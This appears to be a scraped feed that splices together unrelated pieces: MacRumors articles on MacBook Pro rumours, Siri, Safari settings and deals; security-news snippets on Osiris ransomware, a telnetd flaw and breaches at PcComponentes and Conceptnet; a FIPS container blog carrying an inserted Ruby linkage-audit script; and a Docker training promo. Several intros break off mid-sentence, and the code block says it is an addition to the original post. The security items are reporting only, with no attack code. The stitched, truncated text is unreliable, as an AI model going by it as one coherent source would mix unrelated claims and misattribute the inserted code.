Cybersecurity researchers have disclosed details of a new ransomware family called Osiris that targeted a major food service franchisee operator in Southeast Asia in November 2025. The attack leveraged a malicious driver called POORTRY as part of a known technique referred to as bring your own vulnerable driver (BYOVD) to disarm security software, the Symantec and Carbon Black Threat Hunter
Apple is expected to release MacBook Pro models with M5 Pro and M5 Max chips soon, but you might want to pass on them, as bigger changes are around the corner.


It has been reported that the MacBook Pro will be receiving a major redesign in late 2026 or in 2027. Six new features have been rumored so far, including an OLED display, touch capabilities, a Dynamic Island, M6 Pro and M6 Max chips manufactured with TSMC's advanced 2nm process, a thinner design, and built-in cellular connectivity.

The exact launch timing remains to be seen. Apple has updated the MacBook Pro twice in one year in the past, with the M2 Pro and M2 Max models debuting in January 2023 and the M3 Pro and M3 Max models following in October 2023, so there is a chance that the M5 Pro and M5 Max models could debut soon and the models with OLED displays could follow later this year. However, 2027 seems like a safer bet for now.

Keep in mind that the entry-level 14-inch MacBook Pro with the M6 chip is not expected to receive many of the changes listed below.

Apple last redesigned the MacBook Pro in 2021, when the M1 Pro and M1 Max models launched.

OLED Display

Bloomberg's Mark Gurman and others have indicated that the two-generations-away MacBook Pro models will have OLED displays.

The current MacBook Pro models are equipped with LCD displays with mini-LED backlighting. The move to OLED technology would result in improved image quality, thanks to richer colors and higher contrast ratio with true blacks.

All of the iPhone, Apple Watch, and iPad Pro models that Apple sells today are already equipped with OLED displays, excluding refurbished models.

Touch Screen

Not only will the MacBook Pro be moving to OLED, but the displays will apparently have touch-screen capabilities too. This functionality would allow Mac users to use both their fingers and a keyboard and mouse/trackpad for input.

Steve Jobs said that a touch-screen Mac would cause arm fatigue, but he made that comment a long time ago, and Apple does reverse course from time to time.

Dynamic Island

Yet another display-related change on these MacBook Pro models will be a hole-punch camera, according to Gurman. As a result, he said that the MacBook Pro will no longer have a notch. Instead, he expects a Dynamic Island or something "similar."

With a Dynamic Island, the MacBook Pro would move one step closer to a truly edge-to-edge display with thin bezels. Like on the iPhone, the Dynamic Island would display things such as low battery life alerts and AirPods connection indicators in the area surrounding the hole-punch camera at the top-center part of the screen.

M6 Pro and M6 Max Chips

This one is obvious, but the two-generations-away MacBook Pro models will be powered by Apple's two-generations-away M6 Pro and M6 Max chips. Notably, these chips are expected to be manufactured with TSMC's advanced 2nm process, which should result in greater year-over-year performance and efficiency gains than usual.

The current M4 Pro and M4 Max chips and the upcoming M5 Pro and M5 Max chips are or will be built with TSMC's 3nm processes.

Thinner Design

Yet another MacBook Pro rumor shared by Gurman is a thinner design versus existing models.

The move from LCD with mini-LED backlighting to OLED would contribute to the thinner design, and there could be other changes that help to slim things down.

As of now, there has been no indication that Apple plans to once again remove ports like HDMI, MagSafe, or the SD card slot in order to achieve this thinner design, but we shall see. That was a very unpopular decision the last time it happened.

Cellular

Macs can already connect to a cellular network via the Personal Hotspot feature on a nearby iPhone or iPad, but Apple has reportedly at least considered built-in cellular connectivity for future Macs. If these plans moved forward, the MacBook Pro would likely be equipped with Apple's C1X or future C2 modem for 5G and LTE.
This article, "MacBook Pro to Receive Up to Six New Features by Next Year" first appeared on MacRumors.com
Apple is considering a significant shift in how it operates Siri by potentially running its next-generation chatbot on Google's cloud infrastructure rather than entirely on its own Private Cloud Compute servers, according to Bloomberg's Mark Gurman.


In yesterday's report detailing Apple's plans to turn ‌Siri‌ into a chatbot in iOS 27, Gurman said that the company is in discussions with Google about hosting the forthcoming ‌Siri‌ chatbot on Google-owned servers powered by Tensor Processing Units (TPUs), a class of custom chips designed specifically for large-scale artificial intelligence workloads. The arrangement would mark a major departure from Apple's emphasis on processing user requests either directly on-device or through its own tightly controlled Private Cloud Compute infrastructure.



The near-term ‌Siri‌ improvements in iOS 26.4 are still expected to run on Apple's own Private Cloud Compute servers, which the company unveiled in 2024 as a privacy-focused alternative to on-device processing. Private Cloud Compute relies on Apple-designed servers built around high-end Mac chips, and Apple has positioned the system as one where user data is processed temporarily and not retained, not even being accessible to Apple itself. Those claims have been central to Apple's public messaging around Apple Intelligence.

The more advanced ‌Siri‌ chatbot planned for the following major operating system update is expected to rely on a newer and more capable large language model developed by Google. This model is internally referred to as Apple Foundation Models version 11 and is comparable in capability to Google's latest Gemini models. Running such a model at scale may exceed the practical capacity of Apple's current Private Cloud Compute infrastructure, prompting the need to use Google's significantly larger, specialized cloud footprint and AI hardware.

The possibility of running ‌Siri‌ requests on Google servers does not necessarily mean Google would gain access to user data in a conventional sense. Apple already relies on third-party cloud providers, including Google, for parts of iCloud's infrastructure, while retaining control over encryption keys and data handling policies.

Tags: Bloomberg, Google, Mark Gurman, Siri
This article, "Apple's Siri Chatbot May Run on Google Servers" first appeared on MacRumors.com
A critical security flaw has been disclosed in the GNU InetUtils telnet daemon (telnetd) that went unnoticed for nearly 11 years. The vulnerability, tracked as CVE-2026-24061, is rated 9.8 out of 10.0 on the CVSS scoring system. It affects all versions of GNU InetUtils from version 1.9.3 up to and including version 2.7. "Telnetd in GNU Inetutils through 2.7 allows remote authentication bypass
Any iPhone, iPad, or Mac with a ProMotion display is capable of rendering buttery smooth 120Hz animations. However, Apple's Safari browser is locked to 60fps page rendering by default, making scrolling feel noticeably choppier for some users than in Chrome or Firefox. Thankfully, recent versions of Safari include a hidden setting that lets you unlock 120Hz rendering.


At 60Hz, your screen refreshes every 16.7 milliseconds, meaning each frame of a scrolling page stays on screen for that duration. At 120Hz, the refresh interval drops to 8.3 milliseconds, so the image updates twice as often. This reduces the perceived blur and judder as content moves across the screen, making motion look more fluid and responsive. For a better idea of the difference, visit Blur Buster's Motion Tests webpage and watch the refresh rate test in Safari.

The difference is most noticeable when scrolling text-heavy pages or panning across detailed content. That said, the improvement is more dramatic for some people than others. If you've never noticed Safari feeling "off" compared to other apps, you may not register much difference. But if you've used Chrome or Firefox on the same device and wondered why Safari felt slightly sluggish, this is the reason.

The 120Hz option is buried in Safari's Feature Flags, a developer-focused menu that doesn't require any special mode to access on iPhone or iPad. On Mac, you'll need to enable developer features first, but it's a straightforward process. Keep in mind that turning on 120Hz may impact your device's battery life if you tend to browse a lot.

Here's how to enable 120Hz scrolling on all your Apple devices.

Enable 120Hz Safari Browsing on iPhone and iPad


1. Open the Settings app.
2. Scroll down and tap Apps.
3. Tap Safari.
4. Scroll to the bottom and tap Advanced.
5. Tap Feature Flags at the bottom of the list.
6. Scroll to Prefer Page Rendering Updates near 60fps and toggle it off.
7. Force quit Safari and reopen it.

With this setting disabled, Safari will now render pages at up to 120Hz on ProMotion-equipped devices, including iPhone 13 Pro and later, and iPad Pro models with ProMotion.

Enable 120Hz Safari Browsing on Mac

Enabling 120Hz on Mac requires a few extra steps to reveal the Feature Flags menu.

1. Open Safari, then click Safari in the menu bar and choose Settings….
2. Click the Advanced tab.
3. At the bottom of the pane, check the box next to Show features for web developers.
4. A new Feature Flags tab will appear in the toolbar – click it.
5. In the search field at the top right, type 60fps.
6. Uncheck Prefer Page Rendering Updates near 60fps.
7. Quit Safari completely and reopen it.



This works on any Mac with a ProMotion display, which includes the 14-inch and 16-inch MacBook Pro models introduced in 2021 and later. If you have external displays connected to your Mac that are capable of refreshing at 120Hz, they should also benefit from the change.

Kudos goes to MacStories for unearthing the 120Hz scrolling tip recently shared by developer Matt Birchler.

Tag: Safari
This article, "Enable Smoother 120Hz Browsing in Safari" first appeared on MacRumors.com

Amazon this week has a few notable sales from popular brands like Ecovacs, Jackery, and Anker. These include discounts on everything from MagSafe-compatible chargers to portable power stations and robot vacuums.

Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

The highlight of the sale is Ecovacs' range of robot vacuums and mops, with as much as $500 off these devices this week. You can get the Ecovacs Deebot T80 Omni Robot Vacuum and Mop for $499.99, down from $999.99. Another notable discount can be found on the Ecovacs Deebot X8 Pro Omni Robot Vacuum and Mop for $749.00, down from $1,099.00.

$500 OFF: Ecovacs Deebot T80 Pro Robot Vacuum for $499.99
$350 OFF: Ecovacs Deebot X8 Pro Robot Vacuum for $749.00

Additionally, Amazon has discounts on multiple Anker charging accessories, including products like the 3-in-1 MagSafe-Compatible Charging Cube for $97.49, down from $149.95 and the SOLIX C300 Power Station with Lantern for $179.99, down from $249.00. You can find these deals and more in the lists below, and this time around none require any coupon codes.

Ecovacs

Deebot N20 Robot Vacuum Cleaner and Mop - $161.49, down from $199.99
Winbot Mini Window Cleaning Robot - $189.00, down from $239.00
Deebot T80 Omni Robot Vacuum and Mop - $499.99, down from $999.99
Deebot X9 Pro Omni Robot Vacuum and Mop - $699.00, down from $799.00
Deebot X8 Pro Omni Robot Vacuum and Mop - $749.00, down from $1,099.99
Deebot X11 OmniCyclone Robot Vacuum and Mop - $1,099.00, down from $1,499.99
Anker

6-in-1 USB-C Power Strip - $59.99, down from $109.99
MagGo UFO 3-in-1 Qi2 Charger - $61.98, down from $89.99
140W 4-Port GaN USB-C Charger - $64.99, down from $99.99
3-in-1 MagSafe-Compatible Charging Cube - $97.49, down from $149.95
14-Port Prime Docking Station - $169.99, down from $269.99
SOLIX C300 Power Station with Lantern - $179.99, down from $249.00
SOLIX C1000 Gen 2 Portable Power Station - $449.99, down from $799.00
SOLIX C2000 Gen 2 Portable Power Station - $799.00, down from $1,499.00
Jackery

Explorer 300 Portable Power Station + Solar Panel - $349.00, down from $499.00
Explorer 1000 V2 Portable Power Station - $399.00, down from $799.00
Explorer 1500 Portable Power Station - $898.99, down from $1,399.00
HomePower 3000 Portable Power Station - $1,199.00, down from $2,499.00
HomePower 3000 Portable Power Station + Solar Panels - $1,598.99, down from $2,999.00
HomePower 3600 Plus Portable Power Station - $2,099.00, down from $3,699.00

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.

This article, "Amazon Discounts Popular Accessories From Ecovacs, Jackery, and Anker" first appeared on MacRumors.com

While the iOS vs. Android debate has been going on for nearly two decades, one lawmaker in Utah has taken it to the next level with a strange new twist.


According to Utah news station KSL, Utah State Senator Kirk Cullimore (R-Sandy) has proposed a new bill that would designate Android as the state's official mobile operating system. It is a real bill that would amend an existing Utah law outlining the state's official bird, fruit, song, flower, dinosaur, winter sports, and more.

"Utah's state mobile operating system is Android," the proposed amendment reads.

"Someday, everybody with an iPhone will realize that the technology is better on Android," said Cullimore, according to the report. "I'm the only one in my family – all my kids, my wife, they all have iPhones – but I'm holding strong," he added.

The change would take effect on May 6, if the bill were to be passed and signed into law. However, it seems to be a publicity stunt more than anything.

"I don't expect this to really get out of committee," said Cullimore.

Tag: Android
This article, "Utah Adds a Strange Twist to the iPhone vs. Android Debate" first appeared on MacRumors.com

Apple has restructured its artificial intelligence strategy under software chief Craig Federighi, accelerating plans to overhaul Siri by relying on external AI models after years of internal delays and organizational friction.


According to a detailed report from The Information, Apple's approach to artificial intelligence has undergone a significant shift over the past year. Apple software chief Craig Federighi is said to be at the center of that shift: he has assumed direct oversight of the company's AI organization and now drives the decisions that will shape the future of Siri and other Apple Intelligence features across the product lineup.

Last fall, Federighi apparently addressed a joint meeting of Apple's software and AI teams, expressing enthusiasm for closer collaboration while also signaling dissatisfaction with the company's pace of progress in artificial intelligence. Some members of Apple's foundation models team interpreted the remarks as criticism of their work.

In December, Apple moved to consolidate its AI leadership under Federighi, completing a transition that had begun earlier in the year when responsibility for Siri was removed from the AI group and brought under Federighi's software division. In January, Apple announced plans to use Google's Gemini AI models to power future AI upgrades, including an improved version of Siri. In Federighi's view, integrating a third-party model would allow Apple to finally ship a revamped Siri later this year after controversially postponing the update in 2025.

However, the report also outlines internal concerns about the implications of placing AI under Federighi's control. People who have worked closely with him described him as highly cost-conscious and skeptical of investments with uncertain returns. This approach stands in notable contrast to rivals such as OpenAI, Meta Platforms, and Google, which invest tens of billions of dollars in data centers, chips, and AI researchers.

Apple has attempted to limit infrastructure spending by emphasizing on-device processing and its Private Cloud Compute system, which uses Apple silicon. The company was said to be waiting for the cost of AI computation and talent to decline, betting that most consumer use cases will eventually be handled locally on devices.

Federighi apparently viewed AI as unpredictable and difficult to control, preferring deterministic software behavior that could be clearly specified during design reviews. He rejected proposals to use AI to dynamically reorganize the iPhone home screen, arguing that such changes would confuse users.

Tensions over AI strategy have surfaced internally before. Around 2019, Mike Rockwell, who was leading development of the Vision Pro headset, reportedly proposed an AI-driven interface. He criticized Federighi's software approach as overly conservative, prompting a rebuke. Rockwell was later placed in charge of Siri in early 2025 and now reports directly to Federighi.

Despite his earlier skepticism, Federighi's stance shifted following the release of ChatGPT in late 2022. People close to him said he became convinced of the potential of large language models after experimenting with the technology and instructed his teams to explore ways to integrate similar capabilities into Apple products. Federighi reportedly concluded that Apple's internal models did not perform adequately on devices, while members of the foundation models team believed they were being blamed for challenges related to model optimization, which fell under the software organization's responsibilities.

Some team members complained they were not given sufficient guidance on how their models would ultimately be used, limiting their ability to compete with external alternatives. Around the time Apple removed Siri oversight from Giannandrea and assigned it to Rockwell, with Federighi directing the broader effort, Federighi instructed teams to evaluate deep integration of third-party models.

Despite the partnership with Google, Apple plans to continue developing its own AI models, particularly those designed to run on devices. Apple reportedly intends to shrink and adapt models derived from external partners so they can run more fully on Apple hardware, reducing long-term dependence. To support that goal, Apple is said to be considering acquisitions of smaller AI firms specializing in model compression and optimization.

See The Information's full report for more.

Tags: Apple Intelligence, Craig Federighi, The Information
This article, "Report: Apple's New AI Strategy Firms Up Under Craig Federighi" first appeared on MacRumors.com

Most of this week’s threats didn’t rely on new tricks. They relied on familiar systems behaving exactly as designed, just in the wrong hands. Ordinary files, routine services, and trusted workflows were enough to open doors without forcing them. What stands out is how little friction attackers now need. Some activity focused on quiet reach and coverage, others on timing and reuse. The emphasis
FIPS compliance is a great idea that makes the entire software supply chain safer. But teams adopting FIPS-enabled container images are running into strange errors that can be challenging to debug. What they are learning is that correctness at the base image layer does not guarantee compatibility across the ecosystem. Change is complicated, and changing complicated systems with intricate dependency webs often yields surprises. We are in the early adaptation phase of FIPS, and that actually provides interesting opportunities to optimize how things work. Teams that recognize this will rethink how they build FIPS and get ahead of the game.
FIPS in practice
FIPS is a U.S. government standard for cryptography. In simple terms, if you say a system is “FIPS compliant,” that means the cryptographic operations like TLS, hashing, signatures, and random number generation are performed using a specific, validated crypto module in an approved mode. That sounds straightforward until you remember that modern software is built not as one compiled program, but as a web of dependencies that carry their own baggage and quirks.
The FIPS crypto error that caught us off guard
We got a ticket recently for a Rails application in a FIPS-enabled container image. On the surface, everything looked right. Ruby was built to use OpenSSL 3.x with the FIPS provider. The OpenSSL configuration was correct. FIPS mode was active.
However, the application started throwing cryptography module errors from the Postgres Rubygem module. Even more confusing, a minimal reproducer consisting of a basic Ruby app and a stock Postgres did not reproduce the error; the connection was established successfully. The issue only manifested when using ActiveRecord.
The difference came down to code paths. A basic Ruby script using the pg gem directly exercises a simpler set of operations. ActiveRecord triggers additional functionality that exercises different parts of libpq. The non-FIPS crypto was there all along, but only certain operations exposed it.
Your container image can be carefully configured for FIPS, and your application can still end up using non-FIPS crypto because a dependency brought its own crypto along for the ride. In this case, the culprit was a precompiled native artifact associated with the database stack. When you install pg, Bundler may choose to download a prebuilt binary dependency such as libpq.
Unfortunately those prebuilt binaries are usually built with assumptions that cause problems. They may be linked against a different OpenSSL than the one in your image. They may contain statically embedded crypto code. They may load crypto at runtime in a way that is not obvious.
This is the core challenge with FIPS adoption. Your base image can do everything right, but prebuilt dependencies can silently bypass your carefully configured crypto boundary.
Why we cannot just fix it in the base image yet
The practical fix for the Ruby case was adding this to your Gemfile:

gem "pg", "~> 1.1", force_ruby_platform: true

You also need to install libpq-dev to allow compiling from source. This forces Bundler to build the gem from source on your system instead of using a prebuilt binary. When you compile from source inside your controlled build environment, the resulting native extension is linked against the OpenSSL that is actually in your FIPS image.
Bundler also supports an environment/config knob for the same idea called BUNDLE_FORCE_RUBY_PLATFORM. The exact mechanism matters less than the underlying strategy of avoiding prebuilt native artifacts when you are trying to enforce a crypto boundary.
You might reasonably ask why we do not just add BUNDLE_FORCE_RUBY_PLATFORM to the Ruby FIPS image by default. We discussed this internally, and the answer illustrates why FIPS complexity cascades.
Setting that flag globally is not enough on its own. You also need a C compiler and the relevant libraries and headers in the build stage. And not every gem needs this treatment. If you flip the switch globally, you end up compiling every native gem from source, which drags in additional headers and system libraries that you now need to provide. The “simple fix” creates a new dependency management problem.
Teams adopt FIPS images to satisfy compliance. Then they have to add back build complexity to make the crypto boundary real and verify that every dependency respects it. This is not a flaw in FIPS or in the tooling. It is an inherent consequence of retrofitting a strict cryptographic boundary onto an ecosystem built around convenience and precompiled artifacts.
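One way to verify that every dependency actually respects the boundary, and to make the later checklist's ldd advice concrete, is to audit every compiled gem extension for where its libssl/libcrypto come from. This is an added example, not code from the original post or from any FIPS image vendor; it assumes a Linux image with ldd on PATH and a FIPS-validated OpenSSL living under /lib, /lib64, /usr/lib or /usr/lib64, and the SAMPLE_LDD text is constructed rather than captured.

```ruby
# Audit native gem extensions for crypto linkage that bypasses the FIPS OpenSSL.
# Added example, not code from the original post. Assumptions: a Linux image
# with `ldd` on PATH, and the FIPS-validated OpenSSL installed under the
# SYSTEM_LIB_DIRS below (adjust both for your image).
require "open3"
require "openssl"
require "rubygems"

SYSTEM_LIB_DIRS = %w[/lib /lib64 /usr/lib /usr/lib64].freeze # assumption
CRYPTO_SONAME = /\Alib(ssl|crypto)\.so/

# Constructed `ldd` output (not captured from a real system) showing the kind of
# surprise the post describes: libssl comes from the system, but libcrypto
# resolves to a copy under /usr/local that the FIPS configuration knows nothing about.
SAMPLE_LDD = <<~LDD
  linux-vdso.so.1 (0x00007ffd3c5f0000)
  libssl.so.3 => /lib/x86_64-linux-gnu/libssl.so.3 (0x00007f1a2c000000)
  libcrypto.so.3 => /usr/local/lib/libcrypto.so.3 (0x00007f1a2ba00000)
  libpq.so.5 => not found
  libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1a2b800000)
  /lib64/ld-linux-x86-64.so.2 (0x00007f1a2c200000)
LDD

# Parse `ldd` output into { soname => resolved path }. A nil path means the
# loader could not find the library; a statically linked binary yields {}.
def parse_ldd(output)
  output.each_line.with_object({}) do |line, deps|
    line = line.strip
    next if line.empty? || line.include?("statically linked")
    if (m = line.match(/\A(\S+)\s+=>\s+(.+?)\s+\(0x/))
      deps[m[1]] = m[2]
    elsif line.match?(/\A\S+\s+=>\s+not found/)
      deps[line.split.first] = nil
    end
  end
end

# Decide whether an extension's crypto linkage respects the FIPS boundary.
# Returns [[severity, message], ...]; an empty array means nothing suspicious.
def classify_crypto_deps(deps)
  crypto = deps.select { |soname, _| soname.match?(CRYPTO_SONAME) }
  if crypto.empty?
    # No dynamic OpenSSL at all: either the extension does no crypto, or it
    # carries a statically embedded copy. Only a manual look (nm, strings) can tell.
    return [[:warn, "no dynamic libssl/libcrypto; crypto may be statically embedded"]]
  end
  crypto.filter_map do |soname, path|
    if path.nil?
      [:error, "#{soname} is not found at load time"]
    elsif SYSTEM_LIB_DIRS.none? { |dir| path.start_with?("#{dir}/") }
      [:error, "#{soname} resolves to #{path}, outside the system OpenSSL"]
    end
  end
end

# Run ldd on one compiled extension and classify the result.
def audit_extension(path)
  out, status = Open3.capture2e("ldd", path)
  return [[:error, "ldd failed for #{path}: #{out.strip}"]] unless status.success?
  classify_crypto_deps(parse_ldd(out))
rescue Errno::ENOENT => e
  [[:error, "ldd not available: #{e.message}"]]
end

# Walk every installed gem, including extensions compiled into the
# extensions/ directory, and collect findings keyed by .so path.
def audit_installed_gems
  report = {}
  Gem::Specification.each do |spec|
    dirs = [spec.full_gem_path, spec.extension_dir].compact.uniq
    dirs.each do |dir|
      Dir.glob(File.join(dir, "**", "*.so")).each do |ext|
        findings = audit_extension(ext)
        report[ext] = findings unless findings.empty?
      end
    end
  end
  report
end

# What the Ruby process itself believes about its crypto module. This is the
# "FIPS mode was active" check from the post; it says nothing about what a
# native extension loaded behind Ruby's back, which is why the ldd audit exists.
def runtime_crypto_status
  {
    library: OpenSSL::OPENSSL_LIBRARY_VERSION,
    fips_mode: OpenSSL.fips_mode,
    providers: defined?(OpenSSL::Provider) ? OpenSSL::Provider.provider_names : nil,
  }
end

if __FILE__ == $PROGRAM_NAME
  puts "Ruby runtime: #{runtime_crypto_status}"
  puts "Sample ldd findings: #{classify_crypto_deps(parse_ldd(SAMPLE_LDD))}"
  audit_installed_gems.each do |ext, findings|
    puts ext
    findings.each { |sev, msg| puts "  [#{sev}] #{msg}" }
  end
end
```

Run it inside the builder stage after bundle install; a clean run still does not replace exercising the real ORM code path, since a statically embedded copy shows up only as a warning here.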
The patterns we are documenting today will become the defaults tomorrow. The tooling will catch up. Prebuilt packages will get better. Build systems will learn to handle the edge cases. But right now, teams need to understand where the pitfalls are.
What to do if you are starting a FIPS journey
You do not need to become a crypto expert to avoid the obvious traps. You only need a checklist mindset. The teams working through these problems now are building real expertise that will be valuable as FIPS requirements expand across industries.
Treat prebuilt native dependencies as suspect. If a dependency includes compiled code, assume it might carry its own crypto linkage until you verify otherwise. You can use ldd on Linux to inspect dynamic linking and confirm that binaries link against your system OpenSSL rather than a bundled alternative.
Use a multi-stage build and compile where it matters. Keep your runtime image slim, but allow a builder stage with the compiler and headers needed to compile the few native pieces that must align with your FIPS OpenSSL.
Test the real execution path, not just “it starts.” For Rails, that means running a query, not only booting the app or opening a connection. The failures we saw appeared when using the ORM, not on first connection.
Budget for supply-chain debugging. The hard part is not turning on FIPS mode. The hard part is making sure all the moving parts actually respect it. Expect to spend time tracing crypto usage through your dependency graph.

Why this matters beyond government contracts
FIPS compliance has traditionally been seen as a checkbox for federal sales. That is changing. As supply chain security becomes a board-level concern across industries, validated cryptography is moving from “nice to have” to “expected.” The skills teams build solving FIPS problems today translate directly to broader supply chain security challenges.
Think about what you learn when you debug a FIPS failure. You learn to trace crypto usage through your dependency graph, to question prebuilt artifacts, to verify that your security boundaries are actually enforced at runtime. Those skills matter whether you are chasing a FedRAMP certification or just trying to answer your CISO’s questions about software provenance.
The opportunity in the complexity
FIPS is not “just a switch” you flip in a base image. View FIPS instead as a new layer of complexity that you might have to debug across your dependency graph. That can sound like bad news, but switch the framing and it becomes an opportunity to get ahead of where the industry is going.
The ecosystem will adapt and the tooling will improve. The teams investing in understanding these problems now will be the ones who can move fastest when FIPS or something like it becomes table stakes.
If you are planning a FIPS rollout, start by controlling the prebuilt native artifacts that quietly bypass the crypto module you thought you were using. Recognize that every problem you solve is building institutional knowledge that compounds over time. This is not just compliance work. It is an investment in your team’s security engineering capability.

Apple has long been rumored to be planning a dramatic redesign for the iPhone's 20th anniversary in 2027, ever since Bloomberg's Mark Gurman reported last May that the company is aiming for an all-glass device "without any cutouts in the display." But new comments from respected display industry analyst Ross Young appear to throw cold water on these claims.


In a post on X (Twitter) yesterday, the former Counterpoint Research VP clarified remarks he made last June about Apple's display plans, saying he expects the smaller Dynamic Island rumored to be coming to iPhone 18 Pro models this fall to stick around through 2027.

In replies to follow-up questions, Young went further. The now-retired analyst said he still expects Apple's 2028 iPhone Pro models to feature a centered hole-punch cutout in the display – presumably housed within the same smaller Dynamic Island – rather than a true all-screen design. That timeline aligns with a roadmap he shared in June 2025, which predicted that a fully notch-free, truly all-screen iPhone wouldn't arrive until 2030.

If Young's predictions prove accurate, Gurman may need to revise his 20th-anniversary iPhone claims. Or perhaps not. One possibility is that Young's expectations are simply out of date. Supply chain timelines shift regularly, and Apple may have made more progress moving Face ID components and the front-facing selfie camera under the display than Young's sources indicate.

Alternatively, Apple could be developing a special 20th-anniversary model that sits above the iPhone Pro tier, similar to how the original iPhone X was unveiled at Apple's iPhone 8 launch in 2017 (Apple introduced its first Pro models with the iPhone 11 Pro and iPhone 11 Pro Max in September 2019). Such a device could debut the all-screen design Gurman has described, while the standard Pro models retain a smaller Dynamic Island.

Apple is expected to unveil the iPhone 18 Pro and Pro Max this September. The 20th-anniversary iPhone – whatever form it takes – will presumably follow in fall 2027.

Tags: 20th-Anniversary iPhone, Ross Young
This article, "20th Anniversary iPhone May Not Have All-Screen Design After All" first appeared on MacRumors.com

Spanish online electronics retailer PcComponentes has denied a hacker’s claims to have stolen data on its customers.
Hackrisk.io, a strategic cyber threat intelligence platform developed and maintained by Hackmanac, reported that a malicious actor using the alias ‘daghetiaw’ claimed to have hacked the e-commerce company, adding that it was attempting to verify the claim.
According to Hackrisk.io, the hacker allegedly stole data relating to 16.3 million people, including tax identification numbers, orders, invoices, addresses, contact details, Zendesk tickets, credit card metadata, IP addresses, and purchase information. The platform notes that the hacker has shared a sample of 500,000 lines as proof of the data theft from PcComponentes.
CSO contacted PcComponentes, which issued a statement explaining that there had been no unauthorized access to its databases or internal systems.
“What we have detected is a phenomenon known in cybersecurity as credential stuffing. This means that a third party has used email addresses and passwords obtained from security breaches in compromised databases outside of PcComponentes,” the statement said, adding, “The categories of data affected are: name, surname, ID number (in cases where the customer has entered it), address, IP, email, and telephone number.”
PcComponentes said, “The figure of 16 million customers allegedly affected is false, as the number of active accounts on PcComponentes is significantly lower. Furthermore, the illegitimate access has not been widespread, meaning that only some customers have been affected.”
It also explained that bank details have not been compromised in any case, “since PcComponentes does not store them, but only keeps a security code (token) that is used to identify the payment, but does not allow the card to be viewed or charges to be made on its own. This code has no value outside the payment system and cannot be used fraudulently. For this reason, there is no risk of bank details being stolen”; nor are customer passwords, as “they are never stored in our database. Instead, they are converted into a secret, encrypted code (hash). This code is irreversible, which means that neither we nor anyone else can see the original password.”
Finally, PcComponentes reports that it has implemented a series of measures aimed at minimizing the impact of this incident, which “significantly strengthen account protection and reduce the risk of illegitimate access from compromised databases outside PcComponentes that are published on the internet.”
This article originally appeared on Computerworld/CSO España.

The Regensburg-based IT service provider Conceptnet is currently informing visitors to its website about a technical disruption caused by a ransomware attack. According to reports, the attackers gained access to the company's IT infrastructure around January 13, 2026. "Central systems, including web and e-mail servers, were encrypted," the company explains.
Restoration of the systems is ongoing
The attack was immediately detected, isolated and reported to the responsible authorities, the company says. "External IT forensics specialists have since been working together with our team, with the highest priority, on analyzing and restoring the affected systems," the IT service provider assures. However, it is not yet foreseeable whether and when all systems can be fully brought back into operation.
By its own account, Conceptnet serves around 500 customers in total. Those affected by the attack include the energy supplier REWAG, Stadtwerk Regensburg and SSV Jahn Regensburg. The IT service provider says it has set up and brought online numerous provisional websites to bridge the time until regular restoration.
As the Mittelbayerische Zeitung reports, an AI may also have been used in the attack. A ransom demand is also reportedly on the table.
Introduction: Problem, Context & Outcome
Engineering teams in Bangalore often move fast, yet many still struggle with environment inconsistency and deployment failures. Code works on a laptop, then breaks in testing or production. Consequently, teams lose time debugging configuration issues instead of delivering value. Meanwhile, Bangalore remains India’s leading technology hub, where startups and enterprises rapidly adopt cloud, microservices, and CI/CD automation. In this environment, containerization has become a core requirement rather than an optional skill. Docker Trainers in Bangalore help teams package applications consistently, reduce deployment risks, and accelerate delivery across environments. In this blog, you will understand what Docker Trainers in Bangalore do, why Docker matters in today’s DevOps landscape, and how structured training improves real-world delivery outcomes for developers and organizations alike.
Why this matters: Consistent environments reduce failures and increase delivery confidence.
What Are Docker Trainers in Bangalore?
Docker Trainers in Bangalore are industry professionals who teach Docker with a strong focus on practical, production-ready usage. They move beyond basic commands and explain how containerization fits into modern software delivery pipelines. These trainers help developers package applications with all dependencies into repeatable containers. They guide DevOps engineers on building images, managing registries, and integrating Docker with CI/CD workflows. They also support QA, cloud, and SRE teams by ensuring testing and deployment environments remain consistent. In Bangalore’s diverse tech ecosystem, Docker trainers frequently work with startups, IT services firms, and global enterprises. Their training aligns with Agile practices, cloud platforms, and microservices architectures that teams use daily in real projects.
Why this matters: Practical Docker training prepares teams for real production deployments.
Why Docker Trainers in Bangalore Are Important in Modern DevOps & Software Delivery
Modern software delivery demands speed, portability, and reliability at the same time. Organizations in Bangalore deploy applications across cloud, on-premise, and hybrid environments. Docker Trainers in Bangalore help teams manage this complexity effectively. They solve problems such as “works on my machine” issues, manual deployment steps, and slow environment setup. Moreover, Docker training connects directly with CI/CD pipelines, cloud infrastructure, Agile workflows, and DevOps practices. Without expert guidance, teams misuse containers or treat Docker as just another tool. With structured training, teams build efficient, repeatable, and scalable delivery pipelines that support rapid change.
Why this matters: Correct Docker usage accelerates delivery without sacrificing stability.
Core Concepts & Key Components
Containerization Fundamentals
Purpose: Package applications with dependencies for consistency.
How it works: Trainers explain images, containers, layers, and isolation concepts.
Where it is used: Local development, testing, staging, and production.
Docker Images and Registries
Purpose: Store, version, and share application builds.
How it works: Trainers teach image creation, tagging strategies, and registry usage.
Where it is used: CI/CD pipelines and enterprise deployment workflows.
Docker Networking
Purpose: Enable communication between containers and services.
How it works: Trainers cover bridge networks, ports, and service discovery.
Where it is used: Microservices-based architectures.
Data Management with Volumes
Purpose: Persist data beyond container lifecycles.
How it works: Trainers explain volumes and bind mounts clearly.
Where it is used: Databases, stateful applications, and logs.
Docker Security and Best Practices
Purpose: Reduce container security risks.
How it works: Trainers introduce image scanning, least privilege, and secrets handling.
Where it is used: Enterprise and production environments.
Why this matters: These core components form the backbone of containerized systems.
How Docker Trainers in Bangalore Work (Step-by-Step Workflow)
Docker Trainers in Bangalore follow a structured, practical workflow. First, they review the team’s current development and deployment process. Next, they introduce Docker fundamentals using real application examples rather than abstract demos. Then, they guide teams through containerizing applications step by step. After that, they show how Docker integrates into CI/CD pipelines and cloud platforms. They also explain monitoring, logging, and operational considerations. Finally, teams learn how to document images, maintain containers, and support ongoing improvements.
Why this matters: Step-by-step learning ensures long-term Docker adoption.
Real-World Use Cases & Scenarios
